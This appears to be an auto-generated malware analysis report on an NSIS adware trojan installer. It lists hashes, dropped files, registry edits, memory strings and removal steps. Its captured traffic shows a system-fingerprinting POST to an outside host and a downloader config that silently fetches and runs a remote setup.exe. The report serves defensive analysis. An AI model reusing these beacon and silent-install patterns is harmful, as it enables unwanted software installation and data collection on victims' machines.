SearchProtectToolbar_pcap_9baaf8eb34

by malwarelabrobot on September 18th, 2017 in Malware Descriptions.

Trojan.NSIS.StartPage.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 9baaf8eb346b33aab34e95c2649381e5
SHA1: c8fd83dd006bbd289c17a2785971dbd3f16463da
SHA256: f3b15c4b400d195697ffaa8a9056db32f0f7aa771658bde526294e4c433867dd
SSDeep: 24576:9DOKrOkpY+PQbdIuXtWrDGkwmj+ww+rREH:c+pQbCitWrB+fH
Size: 990417 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-08-05 03:46:27
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3676

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.xxx (7288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsischeck654.xml (18956 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (19096 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-wizard.bmp (11040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-header.bmp (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll (2461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFEC9.tmp (47790 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll (5114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (123318 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsis142.xml (598 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll (21 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy20FC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFEB8.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (0 bytes)

Registry activity

The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\9baaf8eb346b33aab34e95c2649381e5_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
d43e12c4c5d319bade804d984fc058e5 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll
d43e12c4c5d319bade804d984fc058e5 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.dll
75c6e59cc3cea43af20438c3c0b76729 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll
eac76a087f7bef5c4ea71c21680add0d c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll
4ed2d7172521630a14197c9f2a5c799e c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll
6f5257c0b8c0ef4d440f4f4fce85fb1b c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll
6def2cf3daf850acdc1a3e7340a439c4 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll
d7a3fa6a6c738b4a3c40d5602af20b08 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll
0745ff646f5af1f1cdd784c06f40fce9 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll
d9256d9acaecabb20b7e9a1595abfa36 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll
42df1fbaa87567adf2b4050805a1a545 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23610 24064 4.44336 e5e7adda692e6e028f515fe3daa2b69f
.rdata 28672 4558 4608 3.6294 5801d712ecba58aa87d1e7d1aa24f3aa
.data 36864 108536 1024 3.48418 cc58d0a55ac015d8f1470ea90f440596
.ndata 147456 180224 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 327680 293000 293376 3.76795 b00feb2ddadebfa05fca759303728af3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://d27foqb3kkzkt9.cloudfront.net/sdk/binsis/2.3a/BiTool.dll 54.239.168.171
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/get_pre_offering_checks?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 54.239.168.188
hxxp://d3oxtn1x3b8d7i.cloudfront.net/binsis/xml?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 54.239.168.188
sub.spirlymo.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /sdk/binsis/2.3a/BiTool.dll HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d27foqb3kkzkt9.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 102912
Connection: keep-alive
Server: nginx
Date: Thu, 09 Mar 2017 12:00:08 GMT
Last-Modified: Tue, 28 Oct 2014 10:54:19 GMT
ETag: "544f75db-19200"
Expires: Thu, 09 Mar 2017 12:10:08 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 57
X-Cache: Hit from cloudfront
Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Tn8cH4-sevBE2jVnTv4bXfjcDqAonEtX5RGfYZkpupYe8dYJK0L6hg==
[binary response body: the BiTool.dll PE image served as application/octet-stream (Content-Length 102912), rendered as unprintable bytes in the capture and omitted here]

<<< skipped >>>

GET /binsis/get_pre_offering_checks?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 16 Sep 2017 23:18:05 GMT
Expires: Sat, 16 Sep 2017 20:31:25 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 41903dc3828cdce2b3daa3c944827b92.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vZAm34Mx8AHs9dvV5NRssT4ebBu9ri_-JnuTcl5CGYnVxOcIIizYlg==
31f8
<?xml version="1.0"?>
<pre_offering_checks>
  <check type="registry" return_name="check_4" return_value_type="boolean">
    <value_to_check><key>HKCU\Software\Somoto\SDP</key><name>uid</name></value_to_check>
  </check>
  <check type="registry" return_name="check_2182" return_value_type="boolean">
    <value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Accelerator</key><name>version</name></value_to_check>
  </check>
  <check type="registry" return_name="check_2246" return_value_type="boolean">
    <value_to_check><key>HKLM\SOFTWARE\YTDownloader</key><name>version</name></value_to_check>
  </check>
  <check type="registry" return_name="check_2450" return_value_type="boolean">
    <value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HotspotShield</key><name>DisplayName</name></value_to_check>
  </check>
  <check type="registry" return_name="check_3850" return_value_type="boolean">
    <value_to_check><key>HKLM\SOFTWARE\YTDownloader</key><name>version</name></value_to_check>
  </check>
  <check type="registry" return_name="check_2056" return_value_type="boolean">
    <value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect</key><name>DisplayName</name></value_to_check>
  </check>
  <check type="registry" return_name="che

<<< skipped >>>

POST /binsis/xml?uid=82B9B6A5FD0041398E063EA8F63FA48B&v=2.3.4&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNGMgMjggMjEgOTkgYTMgYjMtNmQgMDggZjEgMDMgODggNTUgODUgZWIgIEhQUU9FTSAtIDYwNDAwMDA&affid=lionskin&sid=lionskin&s=0 HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Filename: nssFCB.tmp
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Content-Length: 10041
Connection: Keep-Alive
Cache-Control: no-cache

installer_data={"uid":"82B9B6A5FD0041398E063EA8F63FA48B","muid":"8d207bd7870e2fd5ffd9640909f43c11","affid":"lionskin","sid":"lionskin","installerVersion":"2.3.4","osVersion":"6.1.7601 32bit","ieVersion":"9.0.8112.16421","ff_installed":"1","ff_version":"49.0.1.6109","ff_default_homepage":"about:blank","ff_is_default":"0","ie_installed":"1","ie_version":"9.0.8112.16421","ie_default_homepage":"about:blank","ie_is_default":"1","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_2056":"false","check_2060":"false","check_3360":"false","check_2832":"false","check_4042":"false","check_4044":"false","avs_chk_avast_reg_id_1":"false","avs_chk_avast
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 16 Sep 2017 23:18:10 GMT
Vary: Accept-Encoding
Expires: Sat, 16 Sep 2017 20:31:30 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 41903dc3828cdce2b3daa3c944827b92.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rUxaAckN748LeeryRDtHVaB47GnmKIUKGwBSyldPGBw15P9zHjoVzA==
256
<?xml version="1.0" encoding="windows-1252"?>
<sponsored_data>
  <downloader>
    <url>hXXp://sub.spirlymo.com/installers/bi_downloader/1505602947043/setup.exe</url>
    <downloadOnInit>1</downloadOnInit>
    <args>/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="%AffiliateID%" -muid="%MUID%"</args>
  </downloader>
  <offers/>
  <additional_data>
    <tokyo_csrf2_key>a76146b5d45ec851b1bf28ccb70e74ed</tokyo_csrf2_key>
    <tokyo_csrf2_timestamp>1505603890</tokyo_csrf2_timestamp>
    <ping_domain>hXXp://sub.yorkshatb.com</ping_domain>
  </additional_data>
</sponsored_data>
0
HTTP/1.1 200 OK..Content..


The Trojan connects to the servers at the following location(s):

%original file name%.exe_3676:

.text
`.rdata
@.data
.ndata
.rsrc
Vj%SSS
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ers\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll
Anti-Virus (AV) Edition for Windows_is1
ault_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll
t/Windows/CurrentVersion/Uninstall/Kaspersky"
":"lionskin","installerVersion":"2.3.4","osVersion":"6.1.7601 32bit","ieVersion":"9.0.8112.16421"
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp
raprefs.ini
install\Google Chrome
2014 skinpacks.com
.reloc
WINMM.dll
AdvSplash.dll
@.reloc
GetProcessHeap
comdlg32.dll
nsDialogs.dll
All Files|*.*
xml.dll
.?AVexecution_error@TinyXPath@@
Assertion failed: %s, file %s, line %d
zcÁ
cn?%C
zF%c?5
G.oXi
.Ck6M
wEby
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp
nssFCB.tmp
yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="%AffiliateID%" -muid="%MUID%"
.default
1e5.exe
rentVersion\Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
3967CDD-F8BD-4AC9-8369-0D2BD8F246F5}
plore.exe
ninstall\eScan Anti-Virus (AV) Edition for Windows_is1
Microsoft/Windows/CurrentVersion/Uninstall/Kaspersky"
r_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
e":"13122112111791155","browser":{"clear_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
Version\Uninstall\eScan Anti-Virus (AV) Edition for Windows_is1
5250224
c:\%original file name%.exe
C:\SkinPack\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nssFEB8.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
571083322
1049060
{"account_id_migration_state":2,"account_tracker_service_last_update":"13122112111791155","browser":{"clear_lso_data_enabled":true,"default_browser_infobar_last_declined":"13120826992402961","last_known_google_url":"hXXps://VVV.google.com.ua/","pepper_flash_settings_enabled":true,"window_placement":{"bottom":802,"docked":false,"left":10,"maximized":false,"right":953,"top":0,"work_area_bottom":802,"work_area_left":0,"work_area_right":1276,"work_area_top":0}},"countryid_at_install":21843,"credentials_enable_service":true,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2914724","0","0","0","0","0","0","0","0","0","0","0","0","0","0","536636"],"daily_original_length_application":"62478","daily_original_length_unknown":"0","daily_original_length_via_data_reduction_proxy":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy20FC.tmp
/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="%AffiliateID%" -muid="%MUID%"
hXXp://sub.spirlymo.com/installers/bi_downloader/1505602947043/setup.exe
1505603890
hXXp://sub.yorkshatb.com
-1727723021
1180086
1628046802
-2046754816
-2147410511
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b2</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
"$4\IconCache.db"

%original file name%.exe_3676_rwx_10004000_00001000:

callback%d


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Banner.dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\inetc.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\bitool.xxx (7288 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsischeck654.xml (18956 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BiTool[1].dll (5984 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spltmp.bmp (19096 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Aero.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-wizard.bmp (11040 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\modern-header.bmp (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\Math.dll (2461 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\advsplash.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFEC9.tmp (47790 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\md5dll.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\xml.dll (5114 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssFCB.tmp (123318 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\binsis142.xml (598 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsiFFB4.tmp\nsDialogs.dll (21 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
